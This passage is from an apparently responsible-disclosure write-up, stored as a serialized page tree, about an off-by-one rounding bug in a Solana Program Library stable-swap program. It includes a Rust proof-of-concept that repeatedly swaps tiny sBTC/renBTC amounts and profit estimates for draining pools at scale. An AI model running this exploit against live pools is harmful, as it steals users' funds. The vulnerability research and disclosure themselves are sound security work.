d_val",{"type":27,"tag":207,"props":10311,"children":10312},{"style":238},[10313],{"type":33,"value":241},{"type":27,"tag":207,"props":10315,"children":10316},{"class":209,"line":270},[10317,10322,10327,10332,10336,10341],{"type":27,"tag":207,"props":10318,"children":10319},{"style":376},[10320],{"type":33,"value":10321}," for",{"type":27,"tag":207,"props":10323,"children":10324},{"style":220},[10325],{"type":33,"value":10326}," _",{"type":27,"tag":207,"props":10328,"children":10329},{"style":214},[10330],{"type":33,"value":10331}," in",{"type":27,"tag":207,"props":10333,"children":10334},{"style":232},[10335],{"type":33,"value":4680},{"type":27,"tag":207,"props":10337,"children":10338},{"style":226},[10339],{"type":33,"value":10340},"..",{"type":27,"tag":207,"props":10342,"children":10343},{"style":238},[10344],{"type":33,"value":10345},"ITERATIONS {\n",{"type":27,"tag":207,"props":10347,"children":10348},{"class":209,"line":296},[10349,10354,10358,10363,10367,10372,10376,10381,10385,10390,10394,10399,10404,10408,10412,10417,10422,10427,10431,10436,10440,10445],{"type":27,"tag":207,"props":10350,"children":10351},{"style":214},[10352],{"type":33,"value":10353}," let",{"type":27,"tag":207,"props":10355,"children":10356},{"style":238},[10357],{"type":33,"value":686},{"type":27,"tag":207,"props":10359,"children":10360},{"style":220},[10361],{"type":33,"value":10362},"y_new",{"type":27,"tag":207,"props":10364,"children":10365},{"style":238},[10366],{"type":33,"value":1123},{"type":27,"tag":207,"props":10368,"children":10369},{"style":220},[10370],{"type":33,"value":10371},"_",{"type":27,"tag":207,"props":10373,"children":10374},{"style":238},[10375],{"type":33,"value":2222},{"type":27,"tag":207,"props":10377,"children":10378},{"style":226},[10379],{"type":33,"value":10380},"=",{"type":27,"tag":207,"props":10382,"children":10383},{"style":238},[10384],{"type":33,"value":686},{"type":27,"tag":207,"props":10386,"children":10387},{"style":1335},[10388],{"type":33,"value":10389},"checked_u8_power",{"type":27,"tag":207,"props":10391,"children":10392},{"style":238},[10393],{"type":33,"value":1343},{"type":27,"tag":207,"props":10395,"children":10396},{"style":226},[10397],{"type":33,"value":10398},"&",{"type":27,"tag":207,"props":10400,"children":10401},{"style":220},[10402],{"type":33,"value":10403},"y",{"type":27,"tag":207,"props":10405,"children":10406},{"style":238},[10407],{"type":33,"value":1123},{"type":27,"tag":207,"props":10409,"children":10410},{"style":232},[10411],{"type":33,"value":1744},{"type":27,"tag":207,"props":10413,"children":10414},{"style":238},[10415],{"type":33,"value":10416},")",{"type":27,"tag":207,"props":10418,"children":10419},{"style":226},[10420],{"type":33,"value":10421},"?.",{"type":27,"tag":207,"props":10423,"children":10424},{"style":1335},[10425],{"type":33,"value":10426},"checked_add",{"type":27,"tag":207,"props":10428,"children":10429},{"style":238},[10430],{"type":33,"value":1343},{"type":27,"tag":207,"props":10432,"children":10433},{"style":220},[10434],{"type":33,"value":10435},"c",{"type":27,"tag":207,"props":10437,"children":10438},{"style":238},[10439],{"type":33,"value":10416},{"type":27,"tag":207,"props":10441,"children":10442},{"style":226},[10443],{"type":33,"value":10444},"?",{"type":27,"tag":207,"props":10446,"children":10447},{"style":238},[10448],{"type":33,"value":10449},")\n",{"type":27,"tag":207,"props":10451,"children":10452},{"class":209,"line":445},[10453,10458,10463,10467,10472,10476,10480,10484,10488,10492,10496,10500,10504,10508,10513,10517,10521,10526,10530,10535,10539,10543,10547,10551],{"type":27,"tag":207,"props":10454,"children":10455},{"style":226},[10456],{"type":33,"value":10457}," .",{"type":27,"tag":207,"props":10459,"children":10460},{"style":1335},[10461],{"type":33,"value":10462},"checked_ceil_div",{"type":27,"tag":207,"props":10464,"children":10465},{"style":238},[10466],{"type":33,"value":1343},{"type":27,"tag":207,"props":10468,"children":10469},{"style":1335},[10470],{"type":33,"value":10471},"checked_u8_mul",{"type":27,"tag":207,"props":10473,"children":10474},{"style":238},[10475],{"type":33,"value":1343},{"type":27,"tag":207,"props":10477,"children":10478},{"style":226},[10479],{"type":33,"value":10398},{"type":27,"tag":207,"props":10481,"children":10482},{"style":220},[10483],{"type":33,"value":10403},{"type":27,"tag":207,"props":10485,"children":10486},{"style":238},[10487],{"type":33,"value":1123},{"type":27,"tag":207,"props":10489,"children":10490},{"style":232},[10491],{"type":33,"value":1744},{"type":27,"tag":207,"props":10493,"children":10494},{"style":238},[10495],{"type":33,"value":10416},{"type":27,"tag":207,"props":10497,"children":10498},{"style":226},[10499],{"type":33,"value":10421},{"type":27,"tag":207,"props":10501,"children":10502},{"style":1335},[10503],{"type":33,"value":10426},{"type":27,"tag":207,"props":10505,"children":10506},{"style":238},[10507],{"type":33,"value":1343},{"type":27,"tag":207,"props":10509,"children":10510},{"style":220},[10511],{"type":33,"value":10512},"b",{"type":27,"tag":207,"props":10514,"children":10515},{"style":238},[10516],{"type":33,"value":10416},{"type":27,"tag":207,"props":10518,"children":10519},{"style":226},[10520],{"type":33,"value":10421},{"type":27,"tag":207,"props":10522,"children":10523},{"style":1335},[10524],{"type":33,"value":10525},"checked_sub",{"type":27,"tag":207,"props":10527,"children":10528},{"style":238},[10529],{"type":33,"value":1343},{"type":27,"tag":207,"props":10531,"children":10532},{"style":220},[10533],{"type":33,"value":10534},"d_val",{"type":27,"tag":207,"props":10536,"children":10537},{"style":238},[10538],{"type":33,"value":10416},{"type":27,"tag":207,"props":10540,"children":10541},{"style":226},[10542],{"type":33,"value":10444},{"type":27,"tag":207,"props":10544,"children":10545},{"style":238},[10546],{"type":33,"value":10416},{"type":27,"tag":207,"props":10548,"children":10549},{"style":226},[10550],{"type":33,"value":10444},{"type":27,"tag":207,"props":10552,"children":10553},{"style":238},[10554],{"type":33,"value":241},{"type":27,"tag":207,"props":10556,"children":10557},{"class":209,"line":867},[10558,10563,10568,10573,10577],{"type":27,"tag":207,"props":10559,"children":10560},{"style":376},[10561],{"type":33,"value":10562}," if",{"type":27,"tag":207,"props":10564,"children":10565},{"style":220},[10566],{"type":33,"value":10567}," y_new",{"type":27,"tag":207,"props":10569,"children":10570},{"style":226},[10571],{"type":33,"value":10572}," ==",{"type":27,"tag":207,"props":10574,"children":10575},{"style":220},[10576],{"type":33,"value":10300},{"type":27,"tag":207,"props":10578,"children":10579},{"style":238},[10580],{"type":33,"value":384},{"type":27,"tag":207,"props":10582,"children":10583},{"class":209,"line":892},[10584,10589],{"type":27,"tag":207,"props":10585,"children":10586},{"style":376},[10587],{"type":33,"value":10588}," break",{"type":27,"tag":207,"props":10590,"children":10591},{"style":238},[10592],{"type":33,"value":241},{"type":27,"tag":207,"props":10594,"children":10595},{"class":209,"line":1475},[10596,10601,10606],{"type":27,"tag":207,"props":10597,"children":10598},{"style":238},[10599],{"type":33,"value":10600}," } ",{"type":27,"tag":207,"props":10602,"children":10603},{"style":376},[10604],{"type":33,"value":10605},"else",{"type":27,"tag":207,"props":10607,"children":10608},{"style":238},[10609],{"type":33,"value":384},{"type":27,"tag":207,"props":10611,"children":10612},{"class":209,"line":2065},[10613,10618,10622,10626],{"type":27,"tag":207,"props":10614,"children":10615},{"style":220},[10616],{"type":33,"value":10617}," y",{"type":27,"tag":207,"props":10619,"children":10620},{"style":226},[10621],{"type":33,"value":229},{"type":27,"tag":207,"props":10623,"children":10624},{"style":220},[10625],{"type":33,"value":10567},{"type":27,"tag":207,"props":10627,"children":10628},{"style":238},[10629],{"type":33,"value":241},{"type":27,"tag":207,"props":10631,"children":10632},{"class":209,"line":2092},[10633],{"type":27,"tag":207,"props":10634,"children":10635},{"style":238},[10636],{"type":33,"value":10637}," }\n",{"type":27,"tag":207,"props":10639,"children":10640},{"class":209,"line":2130},[10641],{"type":27,"tag":207,"props":10642,"children":10643},{"style":238},[10644],{"type":33,"value":10645}," }\n",{"type":27,"tag":36,"props":10647,"children":10648},{},[10649,10654],{"type":27,"tag":942,"props":10650,"children":10651},{},[10652],{"type":33,"value":10653},"approximate",{"type":33,"value":10655},". Looks suspicious.. Perhaps we really did find a bug in the Solana Program Library?",{"type":27,"tag":36,"props":10657,"children":10658},{},[10659],{"type":33,"value":10660},"With this promising find in mind, we decided to throw together a quick proof of concept. To do this, we attempted to swap very small amounts of tokens back and forth between sBTC and renBTC.",{"type":27,"tag":101,"props":10662,"children":10664},{"code":10663,"language":10269,"meta":7,"className":10270,"style":7},"// from sbtc to renbtc\nfor i in 0 .. 50u8 {\n // create swap transaction\n let mut swap_instruction = swap(\n &spl_token::id(),\n &swap_pubkey,\n &swap_authority_pubkey,\n &test_account_signer.pubkey(),\n &sbtc_user_account,\n &sbtc_reserve,\n &renbtc_reserve,\n &renbtc_user_account,\n &admin_fee_account_sbtc_to_ren,\n 1,\n 2\n ).unwrap();\n\n // nonce\n swap_instruction.data.append(&mut vec![i, extranonce]);\n\n let mut instructions = vec![];\n\n instructions.push(swap_instruction);\n\n env.execute_as_transaction(&instructions, &vec![&test_account_signer]);\n}\n",[10665],{"type":27,"tag":84,"props":10666,"children":10667},{"__ignoreMap":7},[10668,10676,10714,10722,10751,10779,10795,10811,10836,10852,10868,10884,10900,10916,10928,10936,10957,10964,10972,11037,11044,11073,11080,11110,11117,11176],{"type":27,"tag":207,"props":10669,"children":10670},{"class":209,"line":210},[10671],{"type":27,"tag":207,"props":10672,"children":10673},{"style":4647},[10674],{"type":33,"value":10675},"// from sbtc to renbtc\n",{"type":27,"tag":207,"props":10677,"children":10678},{"class":209,"line":244},[10679,10683,10687,10691,10695,10700,10705,10710],{"type":27,"tag":207,"props":10680,"children":10681},{"style":376},[10682],{"type":33,"value":4658},{"type":27,"tag":207,"props":10684,"children":10685},{"style":220},[10686],{"type":33,"value":4671},{"type":27,"tag":207,"props":10688,"children":10689},{"style":214},[10690],{"type":33,"value":10331},{"type":27,"tag":207,"props":10692,"children":10693},{"style":232},[10694],{"type":33,"value":4680},{"type":27,"tag":207,"props":10696,"children":10697},{"style":226},[10698],{"type":33,"value":10699}," ..",{"type":27,"tag":207,"props":10701,"children":10702},{"style":232},[10703],{"type":33,"value":10704}," 50",{"type":27,"tag":207,"props":10706,"children":10707},{"style":8920},[10708],{"type":33,"value":10709},"u8",{"type":27,"tag":207,"props":10711,"children":10712},{"style":238},[10713],{"type":33,"value":384},{"type":27,"tag":207,"props":10715,"children":10716},{"class":209,"line":270},[10717],{"type":27,"tag":207,"props":10718,"children":10719},{"style":4647},[10720],{"type":33,"value":10721}," // create swap transaction\n",{"type":27,"tag":207,"props":10723,"children":10724},{"class":209,"line":296},[10725,10729,10733,10738,10742,10747],{"type":27,"tag":207,"props":10726,"children":10727},{"style":214},[10728],{"type":33,"value":10290},{"type":27,"tag":207,"props":10730,"children":10731},{"style":214},[10732],{"type":33,"value":10295},{"type":27,"tag":207,"props":10734,"children":10735},{"style":220},[10736],{"type":33,"value":10737}," swap_instruction",{"type":27,"tag":207,"props":10739,"children":10740},{"style":226},[10741],{"type":33,"value":229},{"type":27,"tag":207,"props":10743,"children":10744},{"style":1335},[10745],{"type":33,"value":10746}," swap",{"type":27,"tag":207,"props":10748,"children":10749},{"style":238},[10750],{"type":33,"value":9090},{"type":27,"tag":207,"props":10752,"children":10753},{"class":209,"line":445},[10754,10759,10764,10769,10774],{"type":27,"tag":207,"props":10755,"children":10756},{"style":226},[10757],{"type":33,"value":10758}," &",{"type":27,"tag":207,"props":10760,"children":10761},{"style":238},[10762],{"type":33,"value":10763},"spl_token",{"type":27,"tag":207,"props":10765,"children":10766},{"style":226},[10767],{"type":33,"value":10768},"::",{"type":27,"tag":207,"props":10770,"children":10771},{"style":1335},[10772],{"type":33,"value":10773},"id",{"type":27,"tag":207,"props":10775,"children":10776},{"style":238},[10777],{"type":33,"value":10778},"(),\n",{"type":27,"tag":207,"props":10780,"children":10781},{"class":209,"line":867},[10782,10786,10791],{"type":27,"tag":207,"props":10783,"children":10784},{"style":226},[10785],{"type":33,"value":10758},{"type":27,"tag":207,"props":10787,"children":10788},{"style":220},[10789],{"type":33,"value":10790},"swap_pubkey",{"type":27,"tag":207,"props":10792,"children":10793},{"style":238},[10794],{"type":33,"value":1842},{"type":27,"tag":207,"props":10796,"children":10797},{"class":209,"line":892},[10798,10802,10807],{"type":27,"tag":207,"props":10799,"children":10800},{"style":226},[10801],{"type":33,"value":10758},{"type":27,"tag":207,"props":10803,"children":10804},{"style":220},[10805],{"type":33,"value":10806},"swap_authority_pubkey",{"type":27,"tag":207,"props":10808,"children":10809},{"style":238},[10810],{"type":33,"value":1842},{"type":27,"tag":207,"props":10812,"children":10813},{"class":209,"line":1475},[10814,10818,10823,10827,10832],{"type":27,"tag":207,"props":10815,"children":10816},{"style":226},[10817],{"type":33,"value":10758},{"type":27,"tag":207,"props":10819,"children":10820},{"style":220},[10821],{"type":33,"value":10822},"test_account_signer",{"type":27,"tag":207,"props":10824,"children":10825},{"style":226},[10826],{"type":33,"value":1041},{"type":27,"tag":207,"props":10828,"children":10829},{"style":1335},[10830],{"type":33,"value":10831},"pubkey",{"type":27,"tag":207,"props":10833,"children":10834},{"style":238},[10835],{"type":33,"value":10778},{"type":27,"tag":207,"props":10837,"children":10838},{"class":209,"line":2065},[10839,10843,10848],{"type":27,"tag":207,"props":10840,"children":10841},{"style":226},[10842],{"type":33,"value":10758},{"type":27,"tag":207,"props":10844,"children":10845},{"style":220},[10846],{"type":33,"value":10847},"sbtc_user_account",{"type":27,"tag":207,"props":10849,"children":10850},{"style":238},[10851],{"type":33,"value":1842},{"type":27,"tag":207,"props":10853,"children":10854},{"class":209,"line":2092},[10855,10859,10864],{"type":27,"tag":207,"props":10856,"children":10857},{"style":226},[10858],{"type":33,"value":10758},{"type":27,"tag":207,"props":10860,"children":10861},{"style":220},[10862],{"type":33,"value":10863},"sbtc_reserve",{"type":27,"tag":207,"props":10865,"children":10866},{"style":238},[10867],{"type":33,"value":1842},{"type":27,"tag":207,"props":10869,"children":10870},{"class":209,"line":2130},[10871,10875,10880],{"type":27,"tag":207,"props":10872,"children":10873},{"style":226},[10874],{"type":33,"value":10758},{"type":27,"tag":207,"props":10876,"children":10877},{"style":220},[10878],{"type":33,"value":10879},"renbtc_reserve",{"type":27,"tag":207,"props":10881,"children":10882},{"style":238},[10883],{"type":33,"value":1842},{"type":27,"tag":207,"props":10885,"children":10886},{"class":209,"line":2168},[10887,10891,10896],{"type":27,"tag":207,"props":10888,"children":10889},{"style":226},[10890],{"type":33,"value":10758},{"type":27,"tag":207,"props":10892,"children":10893},{"style":220},[10894],{"type":33,"value":10895},"renbtc_user_account",{"type":27,"tag":207,"props":10897,"children":10898},{"style":238},[10899],{"type":33,"value":1842},{"type":27,"tag":207,"props":10901,"children":10902},{"class":209,"line":4095},[10903,10907,10912],{"type":27,"tag":207,"props":10904,"children":10905},{"style":226},[10906],{"type":33,"value":10758},{"type":27,"tag":207,"props":10908,"children":10909},{"style":220},[10910],{"type":33,"value":10911},"admin_fee_account_sbtc_to_ren",{"type":27,"tag":207,"props":10913,"children":10914},{"style":238},[10915],{"type":33,"value":1842},{"type":27,"tag":207,"props":10917,"children":10918},{"class":209,"line":4103},[10919,10924],{"type":27,"tag":207,"props":10920,"children":10921},{"style":232},[10922],{"type":33,"value":10923}," 1",{"type":27,"tag":207,"props":10925,"children":10926},{"style":238},[10927],{"type":33,"value":1842},{"type":27,"tag":207,"props":10929,"children":10930},{"class":209,"line":4154},[10931],{"type":27,"tag":207,"props":10932,"children":10933},{"style":232},[10934],{"type":33,"value":10935}," 2\n",{"type":27,"tag":207,"props":10937,"children":10938},{"class":209,"line":4203},[10939,10944,10948,10953],{"type":27,"tag":207,"props":10940,"children":10941},{"style":238},[10942],{"type":33,"value":10943}," )",{"type":27,"tag":207,"props":10945,"children":10946},{"style":226},[10947],{"type":33,"value":1041},{"type":27,"tag":207,"props":10949,"children":10950},{"style":1335},[10951],{"type":33,"value":10952},"unwrap",{"type":27,"tag":207,"props":10954,"children":10955},{"style":238},[10956],{"type":33,"value":4301},{"type":27,"tag":207,"props":10958,"children":10959},{"class":209,"line":4249},[10960],{"type":27,"tag":207,"props":10961,"children":10962},{"emptyLinePlaceholder":19},[10963],{"type":33,"value":2062},{"type":27,"tag":207,"props":10965,"children":10966},{"class":209,"line":4290},[10967],{"type":27,"tag":207,"props":10968,"children":10969},{"style":4647},[10970],{"type":33,"value":10971}," // nonce\n",{"type":27,"tag":207,"props":10973,"children":10974},{"class":209,"line":4304},[10975,10980,10984,10988,10992,10997,11001,11005,11010,11015,11020,11024,11028,11033],{"type":27,"tag":207,"props":10976,"children":10977},{"style":220},[10978],{"type":33,"value":10979}," swap_instruction",{"type":27,"tag":207,"props":10981,"children":10982},{"style":226},[10983],{"type":33,"value":1041},{"type":27,"tag":207,"props":10985,"children":10986},{"style":238},[10987],{"type":33,"value":9468},{"type":27,"tag":207,"props":10989,"children":10990},{"style":226},[10991],{"type":33,"value":1041},{"type":27,"tag":207,"props":10993,"children":10994},{"style":1335},[10995],{"type":33,"value":10996},"append",{"type":27,"tag":207,"props":10998,"children":10999},{"style":238},[11000],{"type":33,"value":1343},{"type":27,"tag":207,"props":11002,"children":11003},{"style":226},[11004],{"type":33,"value":10398},{"type":27,"tag":207,"props":11006,"children":11007},{"style":214},[11008],{"type":33,"value":11009},"mut",{"type":27,"tag":207,"props":11011,"children":11012},{"style":1335},[11013],{"type":33,"value":11014}," vec!",{"type":27,"tag":207,"props":11016,"children":11017},{"style":238},[11018],{"type":33,"value":11019},"[",{"type":27,"tag":207,"props":11021,"children":11022},{"style":220},[11023],{"type":33,"value":4690},{"type":27,"tag":207,"props":11025,"children":11026},{"style":238},[11027],{"type":33,"value":1123},{"type":27,"tag":207,"props":11029,"children":11030},{"style":220},[11031],{"type":33,"value":11032},"extranonce",{"type":27,"tag":207,"props":11034,"children":11035},{"style":238},[11036],{"type":33,"value":1919},{"type":27,"tag":207,"props":11038,"children":11039},{"class":209,"line":5466},[11040],{"type":27,"tag":207,"props":11041,"children":11042},{"emptyLinePlaceholder":19},[11043],{"type":33,"value":2062},{"type":27,"tag":207,"props":11045,"children":11046},{"class":209,"line":5530},[11047,11051,11055,11060,11064,11068],{"type":27,"tag":207,"props":11048,"children":11049},{"style":214},[11050],{"type":33,"value":10290},{"type":27,"tag":207,"props":11052,"children":11053},{"style":214},[11054],{"type":33,"value":10295},{"type":27,"tag":207,"props":11056,"children":11057},{"style":220},[11058],{"type":33,"value":11059}," instructions",{"type":27,"tag":207,"props":11061,"children":11062},{"style":226},[11063],{"type":33,"value":229},{"type":27,"tag":207,"props":11065,"children":11066},{"style":1335},[11067],{"type":33,"value":11014},{"type":27,"tag":207,"props":11069,"children":11070},{"style":238},[11071],{"type":33,"value":11072},"[];\n",{"type":27,"tag":207,"props":11074,"children":11075},{"class":209,"line":7900},[11076],{"type":27,"tag":207,"props":11077,"children":11078},{"emptyLinePlaceholder":19},[11079],{"type":33,"value":2062},{"type":27,"tag":207,"props":11081,"children":11082},{"class":209,"line":7909},[11083,11088,11092,11097,11101,11106],{"type":27,"tag":207,"props":11084,"children":11085},{"style":220},[11086],{"type":33,"value":11087}," instructions",{"type":27,"tag":207,"props":11089,"children":11090},{"style":226},[11091],{"type":33,"value":1041},{"type":27,"tag":207,"props":11093,"children":11094},{"style":1335},[11095],{"type":33,"value":11096},"push",{"type":27,"tag":207,"props":11098,"children":11099},{"style":238},[11100],{"type":33,"value":1343},{"type":27,"tag":207,"props":11102,"children":11103},{"style":220},[11104],{"type":33,"value":11105},"swap_instruction",{"type":27,"tag":207,"props":11107,"children":11108},{"style":238},[11109],{"type":33,"value":1455},{"type":27,"tag":207,"props":11111,"children":11112},{"class":209,"line":7917},[11113],{"type":27,"tag":207,"props":11114,"children":11115},{"emptyLinePlaceholder":19},[11116],{"type":33,"value":2062},{"type":27,"tag":207,"props":11118,"children":11119},{"class":209,"line":7926},[11120,11125,11129,11134,11138,11142,11147,11151,11155,11160,11164,11168,11172],{"type":27,"tag":207,"props":11121,"children":11122},{"style":220},[11123],{"type":33,"value":11124}," env",{"type":27,"tag":207,"props":11126,"children":11127},{"style":226},[11128],{"type":33,"value":1041},{"type":27,"tag":207,"props":11130,"children":11131},{"style":1335},[11132],{"type":33,"value":11133},"execute_as_transaction",{"type":27,"tag":207,"props":11135,"children":11136},{"style":238},[11137],{"type":33,"value":1343},{"type":27,"tag":207,"props":11139,"children":11140},{"style":226},[11141],{"type":33,"value":10398},{"type":27,"tag":207,"props":11143,"children":11144},{"style":220},[11145],{"type":33,"value":11146},"instructions",{"type":27,"tag":207,"props":11148,"children":11149},{"style":238},[11150],{"type":33,"value":1123},{"type":27,"tag":207,"props":11152,"children":11153},{"style":226},[11154],{"type":33,"value":10398},{"type":27,"tag":207,"props":11156,"children":11157},{"style":1335},[11158],{"type":33,"value":11159},"vec!",{"type":27,"tag":207,"props":11161,"children":11162},{"style":238},[11163],{"type":33,"value":11019},{"type":27,"tag":207,"props":11165,"children":11166},{"style":226},[11167],{"type":33,"value":10398},{"type":27,"tag":207,"props":11169,"children":11170},{"style":220},[11171],{"type":33,"value":10822},{"type":27,"tag":207,"props":11173,"children":11174},{"style":238},[11175],{"type":33,"value":1919},{"type":27,"tag":207,"props":11177,"children":11178},{"class":209,"line":7934},[11179],{"type":27,"tag":207,"props":11180,"children":11181},{"style":238},[11182],{"type":33,"value":451},{"type":27,"tag":36,"props":11184,"children":11185},{},[11186],{"type":33,"value":11187},"It works!",{"type":27,"tag":10222,"props":11189,"children":11190},{},[11191],{"type":27,"tag":36,"props":11192,"children":11193},{},[11194],{"type":33,"value":11195},"holy shit\nyea, this is big",{"type":27,"tag":36,"props":11197,"children":11198},{},[11199],{"type":27,"tag":126,"props":11200,"children":11202},{"alt":7,"src":11201},"/posts/spl-swap/poc.png",[],{"type":27,"tag":28,"props":11204,"children":11206},{"id":11205},"exploitability",[11207],{"type":33,"value":11208},"Exploitability",{"type":27,"tag":36,"props":11210,"children":11211},{},[11212],{"type":33,"value":11213},"Off-by-one bugs are much easier to exploit on Solana compared to other chains, enabled by the relatively low fees on Solana.",{"type":27,"tag":36,"props":11215,"children":11216},{},[11217],{"type":33,"value":11218},"A single swap on Ethereum can cost dozens of dollars, but on Solana packing hundreds of swap instructions into a single transaction costs the same flat rate of 5000 lamports (at least prior to the 1.9 per transaction size compute limit update).",{"type":27,"tag":36,"props":11220,"children":11221},{},[11222],{"type":33,"value":11223},"This transaction cost discrepancy can trip up developers who transitioned from Ethereum to Solana. For example, the developers who wrote tests for the Solana Program Library implementation of stable swap assumed the impact of an off by one error would be negligible.",{"type":27,"tag":36,"props":11225,"children":11226},{},[11227],{"type":27,"tag":126,"props":11228,"children":11230},{"alt":7,"src":11229},"/posts/spl-swap/pr.png",[],{"type":27,"tag":36,"props":11232,"children":11233},{},[11234,11236,11241],{"type":33,"value":11235},"As we mentioned previously, due to the rounding error, each swap allowed an attacker to steal a single token. It's important to keep in mind that this represents a single token ",{"type":27,"tag":942,"props":11237,"children":11238},{},[11239],{"type":33,"value":11240},"per instruction",{"type":33,"value":11242},". Transactions on Solana can also contain multiple instructions.",{"type":27,"tag":36,"props":11244,"children":11245},{},[11246],{"type":33,"value":11247},"With an onchain program, we are able to fit over 50 swap instructions per transaction. Each transaction can be run around 3 times before exceeding the per-instruction compute limit cap. Thus, we can pack around 150 invocations per transaction.",{"type":27,"tag":36,"props":11249,"children":11250},{},[11251,11253,11258],{"type":33,"value":11252},"Some quick napkin math confirms that this ",{"type":27,"tag":942,"props":11254,"children":11255},{},[11256],{"type":33,"value":11257},"is",{"type":33,"value":11259}," indeed profitable. At a price of $41440 per Bitcoin, we are able to steal around 6 cents per transaction.",{"type":27,"tag":36,"props":11261,"children":11262},{},[11263],{"type":27,"tag":84,"props":11264,"children":11268},{"className":11265},[11266,11267],"language-math","math-inline",[11269],{"type":27,"tag":207,"props":11270,"children":11273},{"className":11271},[11272],"katex",[11274],{"type":27,"tag":207,"props":11275,"children":11279},{"className":11276,"ariaHidden":11278},[11277],"katex-html","true",[11280,11386,11442,11482],{"type":27,"tag":207,"props":11281,"children":11284},{"className":11282},[11283],"base",[11285,11291,11297,11359,11369,11375,11382],{"type":27,"tag":207,"props":11286,"children":11290},{"className":11287,"style":11289},[11288],"strut","height:0.8141em;",[],{"type":27,"tag":207,"props":11292,"children":11295},{"className":11293},[11294],"mord",[11296],{"type":33,"value":1651},{"type":27,"tag":207,"props":11298,"children":11300},{"className":11299},[11294],[11301,11306],{"type":27,"tag":207,"props":11302,"children":11304},{"className":11303},[11294],[11305],{"type":33,"value":1660},{"type":27,"tag":207,"props":11307,"children":11310},{"className":11308},[11309],"msupsub",[11311],{"type":27,"tag":207,"props":11312,"children":11315},{"className":11313},[11314],"vlist-t",[11316],{"type":27,"tag":207,"props":11317,"children":11320},{"className":11318},[11319],"vlist-r",[11321],{"type":27,"tag":207,"props":11322,"children":11325},{"className":11323,"style":11289},[11324],"vlist",[11326],{"type":27,"tag":207,"props":11327,"children":11329},{"style":11328},"top:-3.063em;margin-right:0.05em;",[11330,11336],{"type":27,"tag":207,"props":11331,"children":11335},{"className":11332,"style":11334},[11333],"pstrut","height:2.7em;",[],{"type":27,"tag":207,"props":11337,"children":11343},{"className":11338},[11339,11340,11341,11342],"sizing","reset-size6","size3","mtight",[11344],{"type":27,"tag":207,"props":11345,"children":11347},{"className":11346},[11294,11342],[11348,11354],{"type":27,"tag":207,"props":11349,"children":11351},{"className":11350},[11294,11342],[11352],{"type":33,"value":11353},"−",{"type":27,"tag":207,"props":11355,"children":11357},{"className":11356},[11294,11342],[11358],{"type":33,"value":3578},{"type":27,"tag":207,"props":11360,"children":11362},{"className":11361},[11294,33],[11363],{"type":27,"tag":207,"props":11364,"children":11366},{"className":11365},[11294],[11367],{"type":33,"value":11368}," BTC",{"type":27,"tag":207,"props":11370,"children":11374},{"className":11371,"style":11373},[11372],"mspace","margin-right:0.2222em;",[],{"type":27,"tag":207,"props":11376,"children":11379},{"className":11377},[11378],"mbin",[11380],{"type":33,"value":11381},"∗",{"type":27,"tag":207,"props":11383,"children":11385},{"className":11384,"style":11373},[11372],[],{"type":27,"tag":207,"props":11387,"children":11389},{"className":11388},[11283],[11390,11395,11401,11408,11413,11419,11429,11433,11438],{"type":27,"tag":207,"props":11391,"children":11394},{"className":11392,"style":11393},[11288],"height:1em;vertical-align:-0.25em;",[],{"type":27,"tag":207,"props":11396,"children":11398},{"className":11397},[11294],[11399],{"type":33,"value":11400},"$41",{"type":27,"tag":207,"props":11402,"children":11405},{"className":11403},[11404],"mpunct",[11406],{"type":33,"value":11407},",",{"type":27,"tag":207,"props":11409,"children":11412},{"className":11410,"style":11411},[11372],"margin-right:0.1667em;",[],{"type":27,"tag":207,"props":11414,"children":11416},{"className":11415},[11294],[11417],{"type":33,"value":11418},"400/",{"type":27,"tag":207,"props":11420,"children":11422},{"className":11421},[11294,33],[11423],{"type":27,"tag":207,"props":11424,"children":11426},{"className":11425},[11294],[11427],{"type":33,"value":11428},"BTC",{"type":27,"tag":207,"props":11430,"children":11432},{"className":11431,"style":11373},[11372],[],{"type":27,"tag":207,"props":11434,"children":11436},{"className":11435},[11378],[11437],{"type":33,"value":11381},{"type":27,"tag":207,"props":11439,"children":11441},{"className":11440,"style":11373},[11372],[],{"type":27,"tag":207,"props":11443,"children":11445},{"className":11444},[11283],[11446,11451,11457,11467,11472,11478],{"type":27,"tag":207,"props":11447,"children":11450},{"className":11448,"style":11449},[11288],"height:0.8389em;vertical-align:-0.1944em;",[],{"type":27,"tag":207,"props":11452,"children":11454},{"className":11453},[11294],[11455],{"type":33,"value":11456},"150",{"type":27,"tag":207,"props":11458,"children":11460},{"className":11459},[11294,33],[11461],{"type":27,"tag":207,"props":11462,"children":11464},{"className":11463},[11294],[11465],{"type":33,"value":11466}," swaps",{"type":27,"tag":207,"props":11468,"children":11471},{"className":11469,"style":11470},[11372],"margin-right:0.2778em;",[],{"type":27,"tag":207,"props":11473,"children":11476},{"className":11474},[11475],"mrel",[11477],{"type":33,"value":10380},{"type":27,"tag":207,"props":11479,"children":11481},{"className":11480,"style":11470},[11372],[],{"type":27,"tag":207,"props":11483,"children":11485},{"className":11484},[11283],[11486,11491],{"type":27,"tag":207,"props":11487,"children":11490},{"className":11488,"style":11489},[11288],"height:0.8056em;vertical-align:-0.0556em;",[],{"type":27,"tag":207,"props":11492,"children":11494},{"className":11493},[11294],[11495],{"type":33,"value":11496},"$0.0621",{"type":27,"tag":36,"props":11498,"children":11499},{},[11500],{"type":33,"value":11501},"At 200 transactions per second, we can extract just over a million dollars per day.",{"type":27,"tag":36,"props":11503,"children":11504},{},[11505],{"type":33,"value":11506},"We're well on our way to becoming a millionaire!",{"type":27,"tag":28,"props":11508,"children":11510},{"id":11509},"patch",[11511],{"type":33,"value":11512},"Patch",{"type":27,"tag":36,"props":11514,"children":11515},{},[11516],{"type":33,"value":11517},"Now that we had a proof-of-concept going, it was time to contact the relevant teams.",{"type":27,"tag":36,"props":11519,"children":11520},{},[11521],{"type":33,"value":11522},"By grepping through Solana logs for the swap instruction log, we were able to identify many potential spl-token-swap forks.",{"type":27,"tag":101,"props":11524,"children":11528},{"code":11525,"language":11526,"meta":7,"className":11527,"style":7},"solana logs -um | grep 'Instruction: Swap' -B1\n","bash","language-bash shiki shiki-themes slack-dark",[11529],{"type":27,"tag":84,"props":11530,"children":11531},{"__ignoreMap":7},[11532],{"type":27,"tag":207,"props":11533,"children":11534},{"class":209,"line":210},[11535,11539,11544,11549,11554,11559,11564],{"type":27,"tag":207,"props":11536,"children":11537},{"style":1335},[11538],{"type":33,"value":10169},{"type":27,"tag":207,"props":11540,"children":11541},{"style":1325},[11542],{"type":33,"value":11543}," logs",{"type":27,"tag":207,"props":11545,"children":11546},{"style":1325},[11547],{"type":33,"value":11548}," 